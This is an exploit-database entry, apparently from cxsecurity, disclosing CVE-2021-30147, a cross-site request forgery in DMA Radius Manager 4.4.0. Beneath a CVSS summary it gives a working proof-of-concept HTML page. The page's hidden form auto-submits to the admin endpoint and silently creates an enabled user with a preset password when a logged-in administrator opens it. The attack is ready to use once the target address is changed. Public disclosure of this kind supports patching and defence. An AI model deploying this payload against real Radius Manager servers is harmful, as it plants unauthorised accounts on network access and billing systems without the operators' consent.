DMA Radius Manager 4.4.0 Cross Site Request Forgery

2021.04.08
Credit: Issac Briones
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: DMA Radius Manager 4.4.0 - Cross-Site Request Forgery (CSRF) # Date: April 8, 2021 (04/08/2021) # Exploit Author: Issac Briones # Vendor Homepage: http://www.dmasoftlab.com/ # Software Download: https://sourceforge.net/projects/radiusmanager/ # Version: 4.4.0 # CVE: CVE-2021-30147 <html> <body> < ! -- Change IP addr to IP addr that RADIUS manager is located -- > <form action="http://192.168.1.2/admin.php?cont=store_user" method="POST"> <input type="hidden" name="username" value="csrf_usr" /> <input type="hidden" name="enableuser" value="1" /> <input type="hidden" name="acctype" value="0" /> <input type="hidden" name="password1" value="csrfusr" /> <input type="hidden" name="password2" value="csrfusr" /> <input type="hidden" name="maccm" value="" /> <input type="hidden" name="mac" value="" /> <input type="hidden" name="ipmodecpe" value="0" /> <input type="hidden" name="simuse" value="1" /> <input type="hidden" name="firstname" value="" /> <input type="hidden" name="lastname" value="" /> <input type="hidden" name="company" value="" /> <input type="hidden" name="address" value="" /> <input type="hidden" name="city" value="" /> <input type="hidden" name="zip" value="" /> <input type="hidden" name="country" value="" /> <input type="hidden" name="state" value="" /> <input type="hidden" name="phone" value="" /> <input type="hidden" name="mobile" value="" /> <input type="hidden" name="email" value="" /> <input type="hidden" name="taxid" value="" /> <input type="hidden" name="srvid" value="0" /> <input type="hidden" name="downlimit" value="0" /> <input type="hidden" name="uplimit" value="0" /> <input type="hidden" name="comblimit" value="0" /> <input type="hidden" name="expiration" value="2021-04-06" /> <input type="hidden" name="uptimelimit" value="00:00:00" /> <input type="hidden" name="credits" value="0.00" /> <input type="hidden" name="contractid" value="" /> <input type="hidden" name="contractvalid" value="" /> <input type="hidden" name="gpslat" value="" /> <input type="hidden" name="gpslong" value="" /> <input type="hidden" name="comment" value="" /> <input type="hidden" name="superuser" value="{SUPERUSER}" /> <input type="hidden" name="lang" value="English" /> <input type="hidden" name="groupid" value="1" /> <input type="hidden" name="custattr" value="" /> <input type="hidden" name="cnic" value="" /> <input type="hidden" name="cnicfile1" value="(binary)" /> <input type="hidden" name="cnicfile2" value="(binary)" /> <input type="hidden" name="adduser" value="Add user" /> </form> <script> document.forms[0].submit(); </script> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top